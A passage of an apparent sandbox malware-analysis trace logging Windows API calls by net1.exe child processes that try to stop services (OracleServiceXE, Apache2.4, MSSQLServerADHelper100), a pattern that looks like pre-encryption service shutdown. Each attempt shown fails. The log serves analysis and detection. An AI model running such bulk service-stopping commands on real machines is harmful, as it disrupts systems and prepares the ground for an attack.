HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.244] GetConsoleOutputCP () returned 0x1b5 [0071.551] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.552] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.555] sprintf_s (in: _DstBuf=0x1dfc40, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.555] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.557] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.557] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.557] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleServiceXE" [0071.557] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1dfa0c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.557] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x68) returned 0x333bb0 [0071.557] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfc10 | out: Buffer=0x1dfc10*=0x331c08) returned 0x0 [0071.557] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1dfc10 | out: Buffer=0x1dfc10*=0x331c20) returned 0x0 [0071.557] _fileno (_File=0x74eb2900) returned 0 [0071.557] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.557] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.557] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.557] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.557] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.557] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.557] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.557] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.557] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.557] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.557] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.558] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.558] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.558] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.558] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.558] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.558] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.558] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.558] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.558] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.558] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.558] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.558] _wcsicmp (_String1="accounts", _String2="OracleServiceXE") returned -14 [0071.558] _wcsicmp (_String1="computer", _String2="OracleServiceXE") returned -12 [0071.558] _wcsicmp (_String1="config", _String2="OracleServiceXE") returned -12 [0071.558] _wcsicmp (_String1="continue", _String2="OracleServiceXE") returned -12 [0071.558] _wcsicmp (_String1="cont", _String2="OracleServiceXE") returned -12 [0071.558] _wcsicmp (_String1="file", _String2="OracleServiceXE") returned -9 [0071.558] _wcsicmp (_String1="files", _String2="OracleServiceXE") returned -9 [0071.558] _wcsicmp (_String1="group", _String2="OracleServiceXE") returned -8 [0071.558] _wcsicmp (_String1="groups", _String2="OracleServiceXE") returned -8 [0071.558] _wcsicmp (_String1="help", _String2="OracleServiceXE") returned -7 [0071.558] _wcsicmp (_String1="helpmsg", _String2="OracleServiceXE") returned -7 [0071.558] _wcsicmp (_String1="localgroup", _String2="OracleServiceXE") returned -3 [0071.558] _wcsicmp (_String1="pause", _String2="OracleServiceXE") returned 1 [0071.558] _wcsicmp (_String1="session", _String2="OracleServiceXE") returned 4 [0071.558] _wcsicmp (_String1="sessions", _String2="OracleServiceXE") returned 4 [0071.558] _wcsicmp (_String1="sess", _String2="OracleServiceXE") returned 4 [0071.558] _wcsicmp (_String1="share", _String2="OracleServiceXE") returned 4 [0071.558] _wcsicmp (_String1="start", _String2="OracleServiceXE") returned 4 [0071.558] _wcsicmp (_String1="stats", _String2="OracleServiceXE") returned 4 [0071.558] _wcsicmp (_String1="statistics", _String2="OracleServiceXE") returned 4 [0071.558] _wcsicmp (_String1="stop", _String2="OracleServiceXE") returned 4 [0071.558] _wcsicmp (_String1="time", _String2="OracleServiceXE") returned 5 [0071.558] _wcsicmp (_String1="user", _String2="OracleServiceXE") returned 6 [0071.558] _wcsicmp (_String1="users", _String2="OracleServiceXE") returned 6 [0071.558] _wcsicmp (_String1="msg", _String2="OracleServiceXE") returned -2 [0071.558] _wcsicmp (_String1="messenger", _String2="OracleServiceXE") returned -2 [0071.559] _wcsicmp (_String1="receiver", _String2="OracleServiceXE") returned 3 [0071.559] _wcsicmp (_String1="rcv", _String2="OracleServiceXE") returned 3 [0071.559] _wcsicmp (_String1="netpopup", _String2="OracleServiceXE") returned -1 [0071.559] _wcsicmp (_String1="redirector", _String2="OracleServiceXE") returned 3 [0071.559] _wcsicmp (_String1="redir", _String2="OracleServiceXE") returned 3 [0071.559] _wcsicmp (_String1="rdr", _String2="OracleServiceXE") returned 3 [0071.559] _wcsicmp (_String1="workstation", _String2="OracleServiceXE") returned 8 [0071.559] _wcsicmp (_String1="work", _String2="OracleServiceXE") returned 8 [0071.559] _wcsicmp (_String1="wksta", _String2="OracleServiceXE") returned 8 [0071.559] _wcsicmp (_String1="prdr", _String2="OracleServiceXE") returned 1 [0071.559] _wcsicmp (_String1="devrdr", _String2="OracleServiceXE") returned -11 [0071.559] _wcsicmp (_String1="lanmanworkstation", _String2="OracleServiceXE") returned -3 [0071.559] _wcsicmp (_String1="server", _String2="OracleServiceXE") returned 4 [0071.559] _wcsicmp (_String1="svr", _String2="OracleServiceXE") returned 4 [0071.559] _wcsicmp (_String1="srv", _String2="OracleServiceXE") returned 4 [0071.559] _wcsicmp (_String1="lanmanserver", _String2="OracleServiceXE") returned -3 [0071.559] _wcsicmp (_String1="alerter", _String2="OracleServiceXE") returned -14 [0071.559] _wcsicmp (_String1="netlogon", _String2="OracleServiceXE") returned -1 [0071.559] _wcsupr (in: _String="OracleServiceXE" | out: _String="ORACLESERVICEXE") returned="ORACLESERVICEXE" [0071.559] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x335490 [0071.562] GetServiceKeyNameW (in: hSCManager=0x335490, lpDisplayName="ORACLESERVICEXE", lpServiceName=0xb1aaf0, lpcchBuffer=0x1dfbac | out: lpServiceName="", lpcchBuffer=0x1dfbac) returned 0 [0071.563] _wcsicmp (_String1="msg", _String2="ORACLESERVICEXE") returned -2 [0071.563] _wcsicmp (_String1="messenger", _String2="ORACLESERVICEXE") returned -2 [0071.563] _wcsicmp (_String1="receiver", _String2="ORACLESERVICEXE") returned 3 [0071.563] _wcsicmp (_String1="rcv", _String2="ORACLESERVICEXE") returned 3 [0071.563] _wcsicmp (_String1="redirector", _String2="ORACLESERVICEXE") returned 3 [0071.563] _wcsicmp (_String1="redir", _String2="ORACLESERVICEXE") returned 3 [0071.563] _wcsicmp (_String1="rdr", _String2="ORACLESERVICEXE") returned 3 [0071.563] _wcsicmp (_String1="workstation", _String2="ORACLESERVICEXE") returned 8 [0071.563] _wcsicmp (_String1="work", _String2="ORACLESERVICEXE") returned 8 [0071.563] _wcsicmp (_String1="wksta", _String2="ORACLESERVICEXE") returned 8 [0071.563] _wcsicmp (_String1="prdr", _String2="ORACLESERVICEXE") returned 1 [0071.563] _wcsicmp (_String1="devrdr", _String2="ORACLESERVICEXE") returned -11 [0071.563] _wcsicmp (_String1="lanmanworkstation", _String2="ORACLESERVICEXE") returned -3 [0071.563] _wcsicmp (_String1="server", _String2="ORACLESERVICEXE") returned 4 [0071.563] _wcsicmp (_String1="svr", _String2="ORACLESERVICEXE") returned 4 [0071.563] _wcsicmp (_String1="srv", _String2="ORACLESERVICEXE") returned 4 [0071.563] _wcsicmp (_String1="lanmanserver", _String2="ORACLESERVICEXE") returned -3 [0071.563] _wcsicmp (_String1="alerter", _String2="ORACLESERVICEXE") returned -14 [0071.563] _wcsicmp (_String1="netlogon", _String2="ORACLESERVICEXE") returned -1 [0071.563] NetServiceControl (in: servername=0x0, service="ORACLESERVICEXE", opcode=0x0, arg=0x0, bufptr=0x1dfba8 | out: bufptr=0x1dfba8) returned 0x889 [0071.564] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.564] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74150000 [0071.565] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74150000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.566] GetFileType (hFile=0xb) returned 0x2 [0071.566] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1dfac8 | out: lpMode=0x1dfac8) returned 1 [0071.566] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1dfae8, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x1dfae8*=0x1e) returned 1 [0071.567] GetFileType (hFile=0xb) returned 0x2 [0071.567] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1dfac8 | out: lpMode=0x1dfac8) returned 1 [0071.567] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1dfae8, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x1dfae8*=0x2) returned 1 [0071.567] _ultow (in: _Dest=0x889, _Radix=1964824 | out: _Dest=0x889) returned="2185" [0071.568] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74150000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.568] GetFileType (hFile=0xb) returned 0x2 [0071.568] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1dfad4 | out: lpMode=0x1dfad4) returned 1 [0071.568] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1dfaf4, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x1dfaf4*=0x34) returned 1 [0071.569] GetFileType (hFile=0xb) returned 0x2 [0071.569] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1dfad4 | out: lpMode=0x1dfad4) returned 1 [0071.569] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1dfaf4, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x1dfaf4*=0x2) returned 1 [0071.569] NetApiBufferFree (Buffer=0x331c08) returned 0x0 [0071.570] NetApiBufferFree (Buffer=0x331c20) returned 0x0 [0071.570] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop OracleServiceXE" [0071.570] exit (_Code=2) Process: id = "58" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x15560000" os_pid = "0x7d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0x7cc" cmd_line = "C:\\Windows\\system32\\net1 stop Apache2.4" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 181 os_tid = 0x5a4 [0071.267] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f8a0 | out: lpSystemTimeAsFileTime=0x32f8a0*(dwLowDateTime=0x9930bf70, dwHighDateTime=0x1d57b18)) [0071.267] GetCurrentProcessId () returned 0x7d0 [0071.267] GetCurrentThreadId () returned 0x5a4 [0071.267] GetTickCount () returned 0x114bb73 [0071.267] QueryPerformanceCounter (in: lpPerformanceCount=0x32f898 | out: lpPerformanceCount=0x32f898*=19148883704) returned 1 [0071.268] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.268] __set_app_type (_Type=0x1) [0071.268] __p__fmode () returned 0x74eb31f4 [0071.268] __p__commode () returned 0x74eb31fc [0071.268] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.268] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.268] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.268] GetConsoleOutputCP () returned 0x1b5 [0071.268] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.268] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.271] sprintf_s (in: _DstBuf=0x32f858, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.272] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.274] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.274] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.274] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Apache2.4" [0071.274] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x32f624, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.274] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x5c) returned 0x3a3ba8 [0071.274] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32f828 | out: Buffer=0x32f828*=0x3a1c00) returned 0x0 [0071.274] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x32f828 | out: Buffer=0x32f828*=0x3a1c18) returned 0x0 [0071.274] _fileno (_File=0x74eb2900) returned 0 [0071.274] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.275] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.275] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.275] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.275] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.275] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.275] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.275] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.275] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.275] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.275] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.275] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.275] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.275] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.275] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.275] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.275] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.275] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.275] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.275] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.275] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.275] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.275] _wcsicmp (_String1="accounts", _String2="Apache2.4") returned -13 [0071.275] _wcsicmp (_String1="computer", _String2="Apache2.4") returned 2 [0071.275] _wcsicmp (_String1="config", _String2="Apache2.4") returned 2 [0071.275] _wcsicmp (_String1="continue", _String2="Apache2.4") returned 2 [0071.275] _wcsicmp (_String1="cont", _String2="Apache2.4") returned 2 [0071.275] _wcsicmp (_String1="file", _String2="Apache2.4") returned 5 [0071.275] _wcsicmp (_String1="files", _String2="Apache2.4") returned 5 [0071.275] _wcsicmp (_String1="group", _String2="Apache2.4") returned 6 [0071.275] _wcsicmp (_String1="groups", _String2="Apache2.4") returned 6 [0071.275] _wcsicmp (_String1="help", _String2="Apache2.4") returned 7 [0071.275] _wcsicmp (_String1="helpmsg", _String2="Apache2.4") returned 7 [0071.275] _wcsicmp (_String1="localgroup", _String2="Apache2.4") returned 11 [0071.275] _wcsicmp (_String1="pause", _String2="Apache2.4") returned 15 [0071.275] _wcsicmp (_String1="session", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="sessions", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="sess", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="share", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="start", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="stats", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="statistics", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="stop", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="time", _String2="Apache2.4") returned 19 [0071.276] _wcsicmp (_String1="user", _String2="Apache2.4") returned 20 [0071.276] _wcsicmp (_String1="users", _String2="Apache2.4") returned 20 [0071.276] _wcsicmp (_String1="msg", _String2="Apache2.4") returned 12 [0071.276] _wcsicmp (_String1="messenger", _String2="Apache2.4") returned 12 [0071.276] _wcsicmp (_String1="receiver", _String2="Apache2.4") returned 17 [0071.276] _wcsicmp (_String1="rcv", _String2="Apache2.4") returned 17 [0071.276] _wcsicmp (_String1="netpopup", _String2="Apache2.4") returned 13 [0071.276] _wcsicmp (_String1="redirector", _String2="Apache2.4") returned 17 [0071.276] _wcsicmp (_String1="redir", _String2="Apache2.4") returned 17 [0071.276] _wcsicmp (_String1="rdr", _String2="Apache2.4") returned 17 [0071.276] _wcsicmp (_String1="workstation", _String2="Apache2.4") returned 22 [0071.276] _wcsicmp (_String1="work", _String2="Apache2.4") returned 22 [0071.276] _wcsicmp (_String1="wksta", _String2="Apache2.4") returned 22 [0071.276] _wcsicmp (_String1="prdr", _String2="Apache2.4") returned 15 [0071.276] _wcsicmp (_String1="devrdr", _String2="Apache2.4") returned 3 [0071.276] _wcsicmp (_String1="lanmanworkstation", _String2="Apache2.4") returned 11 [0071.276] _wcsicmp (_String1="server", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="svr", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="srv", _String2="Apache2.4") returned 18 [0071.276] _wcsicmp (_String1="lanmanserver", _String2="Apache2.4") returned 11 [0071.276] _wcsicmp (_String1="alerter", _String2="Apache2.4") returned -4 [0071.276] _wcsicmp (_String1="netlogon", _String2="Apache2.4") returned 13 [0071.276] _wcsupr (in: _String="Apache2.4" | out: _String="APACHE2.4") returned="APACHE2.4" [0071.277] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3a5480 [0071.575] GetServiceKeyNameW (in: hSCManager=0x3a5480, lpDisplayName="APACHE2.4", lpServiceName=0xb1aaf0, lpcchBuffer=0x32f7c4 | out: lpServiceName="", lpcchBuffer=0x32f7c4) returned 0 [0071.576] _wcsicmp (_String1="msg", _String2="APACHE2.4") returned 12 [0071.576] _wcsicmp (_String1="messenger", _String2="APACHE2.4") returned 12 [0071.576] _wcsicmp (_String1="receiver", _String2="APACHE2.4") returned 17 [0071.576] _wcsicmp (_String1="rcv", _String2="APACHE2.4") returned 17 [0071.576] _wcsicmp (_String1="redirector", _String2="APACHE2.4") returned 17 [0071.576] _wcsicmp (_String1="redir", _String2="APACHE2.4") returned 17 [0071.576] _wcsicmp (_String1="rdr", _String2="APACHE2.4") returned 17 [0071.576] _wcsicmp (_String1="workstation", _String2="APACHE2.4") returned 22 [0071.576] _wcsicmp (_String1="work", _String2="APACHE2.4") returned 22 [0071.576] _wcsicmp (_String1="wksta", _String2="APACHE2.4") returned 22 [0071.576] _wcsicmp (_String1="prdr", _String2="APACHE2.4") returned 15 [0071.576] _wcsicmp (_String1="devrdr", _String2="APACHE2.4") returned 3 [0071.576] _wcsicmp (_String1="lanmanworkstation", _String2="APACHE2.4") returned 11 [0071.576] _wcsicmp (_String1="server", _String2="APACHE2.4") returned 18 [0071.576] _wcsicmp (_String1="svr", _String2="APACHE2.4") returned 18 [0071.576] _wcsicmp (_String1="srv", _String2="APACHE2.4") returned 18 [0071.576] _wcsicmp (_String1="lanmanserver", _String2="APACHE2.4") returned 11 [0071.576] _wcsicmp (_String1="alerter", _String2="APACHE2.4") returned -4 [0071.576] _wcsicmp (_String1="netlogon", _String2="APACHE2.4") returned 13 [0071.576] NetServiceControl (in: servername=0x0, service="APACHE2.4", opcode=0x0, arg=0x0, bufptr=0x32f7c0 | out: bufptr=0x32f7c0) returned 0x889 [0071.577] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0071.577] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74200000 [0071.578] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74200000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0071.579] GetFileType (hFile=0xb) returned 0x2 [0071.579] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x32f6e0 | out: lpMode=0x32f6e0) returned 1 [0071.580] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x32f700, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x32f700*=0x1e) returned 1 [0071.580] GetFileType (hFile=0xb) returned 0x2 [0071.580] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x32f6e0 | out: lpMode=0x32f6e0) returned 1 [0071.581] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32f700, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x32f700*=0x2) returned 1 [0071.581] _ultow (in: _Dest=0x889, _Radix=3340080 | out: _Dest=0x889) returned="2185" [0071.581] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74200000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0071.581] GetFileType (hFile=0xb) returned 0x2 [0071.581] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x32f6ec | out: lpMode=0x32f6ec) returned 1 [0071.581] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb1b338*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x32f70c, lpReserved=0x0 | out: lpBuffer=0xb1b338*, lpNumberOfCharsWritten=0x32f70c*=0x34) returned 1 [0071.582] GetFileType (hFile=0xb) returned 0x2 [0071.582] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x32f6ec | out: lpMode=0x32f6ec) returned 1 [0071.582] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xb016cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x32f70c, lpReserved=0x0 | out: lpBuffer=0xb016cc*, lpNumberOfCharsWritten=0x32f70c*=0x2) returned 1 [0071.582] NetApiBufferFree (Buffer=0x3a1c00) returned 0x0 [0071.583] NetApiBufferFree (Buffer=0x3a1c18) returned 0x0 [0071.583] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Apache2.4" [0071.583] exit (_Code=2) Process: id = "59" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x16415000" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x8fc" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 182 os_tid = 0x64 [0071.302] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1aff64 | out: lpSystemTimeAsFileTime=0x1aff64*(dwLowDateTime=0x99358230, dwHighDateTime=0x1d57b18)) [0071.302] GetCurrentProcessId () returned 0x55c [0071.302] GetCurrentThreadId () returned 0x64 [0071.302] GetTickCount () returned 0x114bb92 [0071.302] QueryPerformanceCounter (in: lpPerformanceCount=0x1aff5c | out: lpPerformanceCount=0x1aff5c*=19152340865) returned 1 [0071.302] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0071.302] __set_app_type (_Type=0x1) [0071.302] __p__fmode () returned 0x74eb31f4 [0071.302] __p__commode () returned 0x74eb31fc [0071.302] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0071.303] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0071.303] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.303] GetConsoleOutputCP () returned 0x1b5 [0071.303] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0071.303] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.306] sprintf_s (in: _DstBuf=0x1aff1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0071.306] setlocale (category=0, locale=".437") returned="English_United States.437" [0071.309] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0071.309] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0071.309] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100" [0071.309] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1afce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0071.309] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x76) returned 0x60f730 [0071.309] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afeec | out: Buffer=0x1afeec*=0x611c20) returned 0x0 [0071.309] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1afeec | out: Buffer=0x1afeec*=0x611c38) returned 0x0 [0071.309] _fileno (_File=0x74eb2900) returned 0 [0071.309] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0071.309] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0071.309] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0071.309] _wcsicmp (_String1="config", _String2="stop") returned -16 [0071.309] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0071.309] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0071.309] _wcsicmp (_String1="file", _String2="stop") returned -13 [0071.309] _wcsicmp (_String1="files", _String2="stop") returned -13 [0071.309] _wcsicmp (_String1="group", _String2="stop") returned -12 [0071.309] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0071.309] _wcsicmp (_String1="help", _String2="stop") returned -11 [0071.309] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0071.309] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0071.309] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0071.309] _wcsicmp (_String1="session", _String2="stop") returned -15 [0071.309] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0071.310] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0071.310] _wcsicmp (_String1="share", _String2="stop") returned -12 [0071.310] _wcsicmp (_String1="start", _String2="stop") returned -14 [0071.310] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0071.310] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0071.310] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0071.310] _wcsicmp 